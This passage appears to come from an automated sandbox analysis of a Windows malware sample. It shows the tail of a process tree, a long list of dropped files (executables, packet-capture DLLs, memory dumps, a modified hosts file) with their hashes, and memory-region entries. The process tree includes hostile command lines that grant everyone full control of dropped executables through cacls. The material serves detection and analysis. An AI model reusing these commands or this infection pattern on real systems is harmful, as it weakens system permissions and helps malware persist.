                                                      C:\Windows\ime\zyejeil.exe
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4796
                                                  • C:\Windows\system32\cmd.EXE
                                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F
                                                    1⤵
                                                      PID:1680
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                        2⤵
                                                          PID:5140
                                                        • C:\Windows\system32\cacls.exe
                                                          cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F
                                                          2⤵
                                                            PID:5060
                                                        • C:\Windows\system32\cmd.EXE
                                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F
                                                          1⤵
                                                            PID:1604
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                              2⤵
                                                                PID:816
                                                              • C:\Windows\system32\cacls.exe
                                                                cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F
                                                                2⤵
                                                                  PID:5640

                                                              Network

                                                              MITRE ATT&CK Enterprise v15

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • C:\Windows\SysWOW64\Packet.dll

                                                                Filesize

                                                                95KB

                                                                MD5

                                                                86316be34481c1ed5b792169312673fd

                                                                SHA1

                                                                6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                                                SHA256

                                                                49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                                                SHA512

                                                                3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                                              • C:\Windows\SysWOW64\wpcap.dll

                                                                Filesize

                                                                275KB

                                                                MD5

                                                                4633b298d57014627831ccac89a2c50b

                                                                SHA1

                                                                e5f449766722c5c25fa02b065d22a854b6a32a5b

                                                                SHA256

                                                                b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                                                SHA512

                                                                29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                                              • C:\Windows\TEMP\lrcwzntnt\2044.dmp

                                                                Filesize

                                                                4.2MB

                                                                MD5

                                                                034c9a2213e44cf57ed2cd6d69d40d75

                                                                SHA1

                                                                00ff509ea6b20d4cc17d9550761b426045daa200

                                                                SHA256

                                                                cda2eaede2d642d5dd0bcd76cdc6e61c9387a7ed2d66be97fa2475408f856b16

                                                                SHA512

                                                                3eb229473cba46104291d39345da2fede1f1e3d85871ba6331233801ae4591a66f0802b4c37119c5da13f6d816715110bdc9114912fc07e5d169d26e3827e9e3

                                                              • C:\Windows\TEMP\lrcwzntnt\2640.dmp

                                                                Filesize

                                                                3.8MB

                                                                MD5

                                                                49782ed84678a8564f6e3d11a2ddc72e

                                                                SHA1

                                                                2761ca2574db66b7b37d27ced97e4919b73ab132

                                                                SHA256

                                                                d62019ceecd07ca8d1f2737153f53d13b043aadd121813b91685d925b49e647b

                                                                SHA512

                                                                b11e1e02bcf072199f0fa29923eff183d30c402996069fa87de6720d912d66da5452c93b7fbb49988196f2451264acae95a78f5415650b63827e929f95edf37d

                                                              • C:\Windows\TEMP\lrcwzntnt\2848.dmp

                                                                Filesize

                                                                3.0MB

                                                                MD5

                                                                35cbae125f409a741ece7163da210da4

                                                                SHA1

                                                                8d595fd0c32df30e195b284b1945c986fff337d8

                                                                SHA256

                                                                5eb422351436a274eb1883e0cc749059dac3fe08f6e56a261b7f562db0fa736d

                                                                SHA512

                                                                70c8e74bec4e4d43eaf5419fe19faddc341959cf1600521e7bd7e53f7d98ba2cd3b10ebcbf2537108e4ec9330f3a1811d09c70bffec7f52bd319afd1f91970ca

                                                              • C:\Windows\TEMP\lrcwzntnt\2856.dmp

                                                                Filesize

                                                                7.6MB

                                                                MD5

                                                                c616a3c09ab1337fdba411ef067c3314

                                                                SHA1

                                                                9ac109f6f122292e71ed09137bddb3712bc3778d

                                                                SHA256

                                                                7ba68f578cd83db1615ed91b8f70f139b70cf4f7120624e3d2062dbf7e25f608

                                                                SHA512

                                                                d0ae6f43f8c9899f6b46666ca5748a961caab4aaf17ef7b0e9bddda4bafdf1d3358fdcd6af51b44197459e7327bb702cb34ce394e099f5b5bb27f6246ff844b5

                                                              • C:\Windows\TEMP\lrcwzntnt\3128.dmp

                                                                Filesize

                                                                818KB

                                                                MD5

                                                                e742ef348c1f1377b82f5c8358ed3e79

                                                                SHA1

                                                                e8a3ac6ddfe188405974e3d5ed2f3df5154bbc5b

                                                                SHA256

                                                                1392f768a6780822ea4708f33215d38baae276ddd0b14bc370fdc2bd49ac9ed1

                                                                SHA512

                                                                0fab929759c605efca8a44f792cd795f1a53d20539bc90f2a6024489ac7e0e2c06fa942ef917a97b5fa6c1142d51dfe406a3c92cb1e7312fca8b6ab428ca0505

                                                              • C:\Windows\TEMP\lrcwzntnt\3744.dmp

                                                                Filesize

                                                                2.7MB

                                                                MD5

                                                                7c6eaf92766031a562835c223f30f3e3

                                                                SHA1

                                                                0db64d67b2b3ee0d2dc0c330703ffdfd1e8ad8ad

                                                                SHA256

                                                                54e316e5654f3ba131bbf448ce5d9209f4d1a7fce8569d4878e644f80130ec8c

                                                                SHA512

                                                                ed104f3b4b6ba463207e32021b2237d2f8134bace9b70757f36a5797c59bbe83d284860aa3345230994fd9020ec59ca3546c12c9450ff4819ab5a371211a415b

                                                              • C:\Windows\TEMP\lrcwzntnt\380.dmp

                                                                Filesize

                                                                33.6MB

                                                                MD5

                                                                e32e5f5fe5f3c8078ab49fa804ec2df8

                                                                SHA1

                                                                d308ea96b61965c12ae2ea65247962abea7016b9

                                                                SHA256

                                                                c3bc70de3dc0905d72f7b751b9652d02a2f06681c6b08501365c6c6c8cfa2a79

                                                                SHA512

                                                                d45576114eaf251b906faf7ef71e721c2dfc50234e3eea6cb0472af86e84e076ac3f6f2940c57c25da70ca945ddf0824486925cb14b60888415b3f471065e28f

                                                              • C:\Windows\TEMP\lrcwzntnt\3832.dmp

                                                                Filesize

                                                                2.2MB

                                                                MD5

                                                                17be856a1e622ff6b7217f1e2eaf6c47

                                                                SHA1

                                                                7fe7e001eddb890cf42d849f26e1b16b1a922262

                                                                SHA256

                                                                76c3fdaebc9fdba36a28a4683e1beeb5ceaf10cc3d5ab5edc63d0fc9518cb795

                                                                SHA512

                                                                22ce72cb11bf5f3f4f152c1f0e381b4348352eb5ee2f86515e7790a35a7f1ccafa19acdb4b4c23677a2436def7e3e427818fdf3c28efe86f75a65a721fff1763

                                                              • C:\Windows\TEMP\lrcwzntnt\3928.dmp

                                                                Filesize

                                                                21.0MB

                                                                MD5

                                                                cb0df6cde4d00c9ed5260e3a98f451e0

                                                                SHA1

                                                                a7be16fa20797405fc0ad7fb45c94dc1395ec28b

                                                                SHA256

                                                                4f34431d9b5f8eb8a335817d0574c8bd262d0237bccdf5eaf6ed0b1456bd67bf

                                                                SHA512

                                                                e8a50f3713fde4c8225c8eb9bf5ab33c918c0110233c744bfb29b1d17dbeebfc20e27cb53b48d6a24756214d969230312b759915b974dbf9a5b4fe8bb3cc61c8

                                                              • C:\Windows\TEMP\lrcwzntnt\3992.dmp

                                                                Filesize

                                                                4.2MB

                                                                MD5

                                                                29fc63a7fa0cd679f808ec632236daaa

                                                                SHA1

                                                                ff29bba7970a1eabd9953a63e74218971ee3e715

                                                                SHA256

                                                                d5d78df713148bc4fe5ef0e1b78c11471f30daef99763c209ca90858a57fb0f8

                                                                SHA512

                                                                f18709adea4dc3c078b08a745a84a4c059812c8cf82fe2cfadf2d5cc59ba7eaeacfadbf4c8a843988daf16403d7b4a710216b7445f40f744e46763e016f88978

                                                              • C:\Windows\TEMP\lrcwzntnt\4080.dmp

                                                                Filesize

                                                                44.1MB

                                                                MD5

                                                                d0926b1d00dbc2de34ad5fd19a5ea7da

                                                                SHA1

                                                                5eef84e36e4a6197f66aa72bd71758a13b966075

                                                                SHA256

                                                                e95d1703a242f0cac9ab17f908f2ceabf3ef7e64ac79fcda581f1745fcd6b22e

                                                                SHA512

                                                                294d8498b430ae449c44404fd6771f075525f8f59ad6174f72ec6fbe88091f9483391fdc4746bc54a7bc978c01e177870f06141fccadc1436bcfceb7cc81e769

                                                              • C:\Windows\TEMP\lrcwzntnt\4104.dmp

                                                                Filesize

                                                                25.9MB

                                                                MD5

                                                                afcbb0e1914a0ab4aad08643a42e632e

                                                                SHA1

                                                                ee48429d102ab908bccc6c0e0cfa0da90e46c45c

                                                                SHA256

                                                                51968994466b3ec4884d0229ba3192bea34d0a97bea6c88e79e940aa609abe7a

                                                                SHA512

                                                                9e5acbe0cb92ac39e0c4632398746d43cab9185609f56855011ad859788971ad21ec85711aeb8b51509d89852b0e646e9124942d1f87e1f39f62730667d54875

                                                              • C:\Windows\TEMP\lrcwzntnt\4108.dmp

                                                                Filesize

                                                                1.2MB

                                                                MD5

                                                                cc83bda2df320c0b37993ae96691bb25

                                                                SHA1

                                                                0790ec71f0af51be0fe94872378132c7bb3fca15

                                                                SHA256

                                                                a2a7932c18ddd88750ae31b08bf35f22803b6658416372d5406ea8bc6b60d318

                                                                SHA512

                                                                db6462cfd1be534502a0d22735afff8f8e6f2108699b9f3be29ee0c7706ed397855d50b3d191f422adedc7648c080ec991fd3fcbbb56e98a61f9470e95349033

                                                              • C:\Windows\TEMP\lrcwzntnt\4548.dmp

                                                                Filesize

                                                                8.6MB

                                                                MD5

                                                                e1d721556e34514c2d4079eff54900fd

                                                                SHA1

                                                                13c16f891470185b480f6972087fe18423af4a9a

                                                                SHA256

                                                                884c260484b2253bc0620748fed5008dcf37c1d0f7710968e25e1e2409783d8e

                                                                SHA512

                                                                45a7e5b32dacfd7c446a94f41f58c0e28303f529126f688fda8d941f117d1bc02e5f8dc0dba95490d379f10645935327ae5c9ef40af451d242e30173c1fb99e3

                                                              • C:\Windows\TEMP\lrcwzntnt\792.dmp

                                                                Filesize

                                                                1019KB

                                                                MD5

                                                                eed591f2c462076a4c512c4215e53c6b

                                                                SHA1

                                                                552b245b89e84731407858ff912d94f581eb2a23

                                                                SHA256

                                                                e36b75c3728d648c11e57caf89698a9cc2da8a3a03a43506161e6c6602c221cd

                                                                SHA512

                                                                cab0052fc15138cb214c83a63f8ca34edaaff038ff5c29c530558af1cac1c0aac832e4e48b58d744acef05d474fad9c9ef38c7356832e8743f7f6a79bfd81f2f

                                                              • C:\Windows\TEMP\stjqapuut\config.json

                                                                Filesize

                                                                693B

                                                                MD5

                                                                f2d396833af4aea7b9afde89593ca56e

                                                                SHA1

                                                                08d8f699040d3ca94e9d46fc400e3feb4a18b96b

                                                                SHA256

                                                                d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

                                                                SHA512

                                                                2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

                                                              • C:\Windows\Temp\lrcwzntnt\ucqzmelym.exe

                                                                Filesize

                                                                126KB

                                                                MD5

                                                                e8d45731654929413d79b3818d6a5011

                                                                SHA1

                                                                23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                                                SHA256

                                                                a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                                                SHA512

                                                                df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                                              • C:\Windows\Temp\nsyE85E.tmp\System.dll

                                                                Filesize

                                                                11KB

                                                                MD5

                                                                2ae993a2ffec0c137eb51c8832691bcb

                                                                SHA1

                                                                98e0b37b7c14890f8a599f35678af5e9435906e1

                                                                SHA256

                                                                681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

                                                                SHA512

                                                                2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

                                                              • C:\Windows\Temp\nsyE85E.tmp\nsExec.dll

                                                                Filesize

                                                                6KB

                                                                MD5

                                                                b648c78981c02c434d6a04d4422a6198

                                                                SHA1

                                                                74d99eed1eae76c7f43454c01cdb7030e5772fc2

                                                                SHA256

                                                                3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

                                                                SHA512

                                                                219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                                              • C:\Windows\Temp\stjqapuut\ejzklm.exe

                                                                Filesize

                                                                343KB

                                                                MD5

                                                                2b4ac7b362261cb3f6f9583751708064

                                                                SHA1

                                                                b93693b19ebc99da8a007fed1a45c01c5071fb7f

                                                                SHA256

                                                                a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

                                                                SHA512

                                                                c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

                                                              • C:\Windows\Temp\xohudmc.exe

                                                                Filesize

                                                                72KB

                                                                MD5

                                                                cbefa7108d0cf4186cdf3a82d6db80cd

                                                                SHA1

                                                                73aeaf73ddd694f99ccbcff13bd788bb77f223db

                                                                SHA256

                                                                7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

                                                                SHA512

                                                                b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

                                                              • C:\Windows\lrcwzntnt\Corporate\vfshost.exe

                                                                Filesize

                                                                381KB

                                                                MD5

                                                                fd5efccde59e94eec8bb2735aa577b2b

                                                                SHA1

                                                                51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                                                SHA256

                                                                441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

                                                                SHA512

                                                                74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                                              • C:\Windows\lrcwzntnt\bmkbibntg\Result.txt

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                f51c47324aaa696e6fc5e121b45f9d7b

                                                                SHA1

                                                                274d82a0002a7fed7e902324ca0515f17dd83035

                                                                SHA256

                                                                0901c8109d690bbe0a0cc755958f120a51415761b849fd126e633de9bff9fb61

                                                                SHA512

                                                                3bb1634e1577efe9897a973fbc78d63f57d82296295d1e707e735d05bd24aca8e88f5228780e5178df3fd6a763c6bcffd108f2c86c62cbbc8c557e3be0896398

                                                              • C:\Windows\lrcwzntnt\bmkbibntg\Result.txt

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                42a8cf19a082d0b55d4f1e9772448c3d

                                                                SHA1

                                                                fca8e344b39677303c64264989751112043d503a

                                                                SHA256

                                                                7eb92fe0c995163b687596627818be2eb9e70df6f3fcd14b0cddc5e0bcc5415c

                                                                SHA512

                                                                238abbc9fbc807cd0009d0d698462c061fed07b4993fa698b13107d94b9d87df235a66f3d9944e4a8cd9367460706c6ec1af7ab5428671831db26950a6a6e332

                                                              • C:\Windows\lrcwzntnt\bmkbibntg\Result.txt

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                1288f692a57a708e2433365a27160dc8

                                                                SHA1

                                                                a4bf9c73c3e81b8e47ab174c20933a16a39936a9

                                                                SHA256

                                                                a191d0fe5f08a62c8a8d278f2f8301ec9620fd397e3e05563a06193b20e2306a

                                                                SHA512

                                                                bb7ab3d11959c67407df712905651b04eb011909007e91e61f7a318f95e59351d87fc76ef5d4ed93604618dd8c9411c8a9030bdfc259599402f902e9e77ecaf4

                                                              • C:\Windows\lrcwzntnt\bmkbibntg\Result.txt

                                                                Filesize

                                                                2KB

                                                                MD5

                                                                101850319f4cf044a84178a0d34ca219

                                                                SHA1

                                                                63de601dbdbeda84b879bd5a4c408155921bdb94

                                                                SHA256

                                                                6483d95f26658cbe06b60888ae35571708f72fcc755cfef1135d03a7b1e6bf5e

                                                                SHA512

                                                                cd621874f6a812b6850caf0a15a1933fe6379ea434b9d1b260f838e02a9b36a4e16fa71ae936314905131dab93fe2b41f6e75399be340369a94266803eec679c

                                                              • C:\Windows\lrcwzntnt\bmkbibntg\Result.txt

                                                                Filesize

                                                                2KB

                                                                MD5

                                                                95a0464784c9feeca137c9e65628c090

                                                                SHA1

                                                                2ce6fdb5483c89e44a987fda0bb9b276fa0f9c02

                                                                SHA256

                                                                3d1f9f56b38fb7c7e4e1991aaaae1892ad314ec6a3673b07df19cc05023c799a

                                                                SHA512

                                                                d579da53ad649c458676f50b97fc4b109272cf7b3d57f890de74fdbf8cb2c9206ac94b89bbb3fe56d44db21e9e2c6201ccdea1049e6b86115211d7dcf6fc3218

                                                              • C:\Windows\lrcwzntnt\bmkbibntg\Result.txt

                                                                Filesize

                                                                3KB

                                                                MD5

                                                                998d24b254ba660b5b2f8a9caf0a65ab

                                                                SHA1

                                                                4db707855370ca637d038c30a50a4ae927e202ae

                                                                SHA256

                                                                5ffb99019dbe4ba9b36e0f2d6ca9b9b235407a6132a746c08a3e88b05c2c2b2f

                                                                SHA512

                                                                0f33bd36a7e436ccc669f7527359a866332230b9c6928a95f3792356f6197918e72f50355df977554ab657cec46218322746a47cc3d187196e49998d31b7c12d

                                                              • C:\Windows\lrcwzntnt\bmkbibntg\Result.txt

                                                                Filesize

                                                                3KB

                                                                MD5

                                                                d3841b022ff6cd34e844b12cb41552d7

                                                                SHA1

                                                                72cf79c505dfe86c05247037913ffd320738131f

                                                                SHA256

                                                                68e3d319a3e93bfa36cfcf66f82a795a70eae07dbadf9d6113d9bb280d0d7c3d

                                                                SHA512

                                                                d84b4de729cf7751f72220cb30707eeeb58c2e81cc1e420363a5fc809a321f73f1feff51d550f2736387c696271d174b1b949990c6800c57c22583e260efcdcb

                                                              • C:\Windows\lrcwzntnt\bmkbibntg\Result.txt

                                                                Filesize

                                                                4KB

                                                                MD5

                                                                ee60ac1d6594e6e97d3890d7b6248ed6

                                                                SHA1

                                                                db034ce8007e819b3112e05667a809ce20619527

                                                                SHA256

                                                                677274f3a668acebf8dc575e1f3ca4547b07dd62198c1594c3bdffa86a7baa94

                                                                SHA512

                                                                78316e61349a1aef19f30d672fb68cf1d51ec9fc046f25f4c764a1c5b5dbd73ad5e75224f0a4575f8ca033483fe84ea7547ca807a661a2db81065b15fc5bf226

                                                              • C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe

                                                                Filesize

                                                                424KB

                                                                MD5

                                                                e9c001647c67e12666f27f9984778ad6

                                                                SHA1

                                                                51961af0a52a2cc3ff2c4149f8d7011490051977

                                                                SHA256

                                                                7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

                                                                SHA512

                                                                56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

                                                              • C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe

                                                                Filesize

                                                                332KB

                                                                MD5

                                                                ea774c81fe7b5d9708caa278cf3f3c68

                                                                SHA1

                                                                fc09f3b838289271a0e744412f5f6f3d9cf26cee

                                                                SHA256

                                                                4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

                                                                SHA512

                                                                7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                                              • C:\Windows\system32\drivers\etc\hosts

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                c838e174298c403c2bbdf3cb4bdbb597

                                                                SHA1

                                                                70eeb7dfad9488f14351415800e67454e2b4b95b

                                                                SHA256

                                                                1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

                                                                SHA512

                                                                c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

                                                              • C:\Windows\uzepkltb\zyejeil.exe

                                                                Filesize

                                                                10.0MB

                                                                MD5

                                                                39181c3a3ba7ea6e2a9252c57e58a303

                                                                SHA1

                                                                548982a92d89871c08cac2bf20f7220dfa0231cb

                                                                SHA256

                                                                671ee7fd90ec98dc50865486d7420c81eafc0ed6cb83353ac1345827b106c3a9

                                                                SHA512

                                                                0500e44f1134fcf156bf216da35f9cae30a6284ec00fd66b3205636f6bf2980af41c5e5afbb82b8c434f6df8db780c107e9119a8d53d084ca2eb8204bcc3ac3f

                                                              • memory/208-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                                                Filesize

                                                                6.6MB

                                                              • memory/208-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                                                Filesize

                                                                6.6MB

                                                              • memory/448-175-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                              • memory/776-215-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                              • memory/964-162-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                Filesize

                                                                72KB

                                                              • memory/964-152-0x0000000010000000-0x0000000010008000-memory.dmp

                                                                Filesize

                                                                32KB

                                                              • memory/1040-206-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                              • memory/1360-201-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                              • memory/1616-185-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                              • memory/2156-78-0x0000000001400000-0x000000000144C000-memory.dmp

                                                                Filesize

                                                                304KB

                                                              • memory/2176-228-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                              • memory/2312-171-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                              • memory/2820-233-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                              • memory/2968-138-0x00007FF75E1F0000-0x00007FF75E2DE000-memory.dmp

                                                                Filesize

                                                                952KB

                                                              • memory/2968-136-0x00007FF75E1F0000-0x00007FF75E2DE000-memory.dmp

                                                                Filesize

                                                                952KB

                                                              • memory/3104-193-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                              • memory/3176-219-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                              • memory/3736-197-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                              • memory/3800-231-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                              • memory/4156-224-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                              • memory/4260-246-0x00000000005E0000-0x00000000005F2000-memory.dmp

                                                                Filesize

                                                                72KB

                                                              • memory/4792-142-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                              • memory/4792-150-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                              • memory/4792-210-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                              • memory/4880-8-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                                                Filesize

                                                                6.6MB

                                                              • memory/4900-180-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                              • memory/4956-189-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                              • memory/4972-178-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp

                                                                Filesize

                                                                1.1MB

                                                              • memory/4972-165-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp

                                                                Filesize

                                                                1.1MB

                                                              • memory/4972-247-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp

                                                                Filesize

                                                                1.1MB

                                                              • memory/4972-182-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp

                                                                Filesize

                                                                1.1MB

                                                              • memory/4972-221-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp

                                                                Filesize

                                                                1.1MB

                                                              • memory/4972-236-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp

                                                                Filesize

                                                                1.1MB

                                                              • memory/4972-168-0x0000014F550A0000-0x0000014F550B0000-memory.dmp

                                                                Filesize

                                                                64KB

                                                              • memory/4972-203-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp

                                                                Filesize

                                                                1.1MB

                                                              • memory/4972-475-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp

                                                                Filesize

                                                                1.1MB

                                                              • memory/4972-476-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp

                                                                Filesize

                                                                1.1MB

                                                              • memory/4972-478-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp

                                                                Filesize

                                                                1.1MB

                                                              • memory/4972-212-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp

                                                                Filesize

                                                                1.1MB

                                                              • memory/4972-733-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp

                                                                Filesize

                                                                1.1MB

                                                              • memory/4972-735-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp

                                                                Filesize

                                                                1.1MB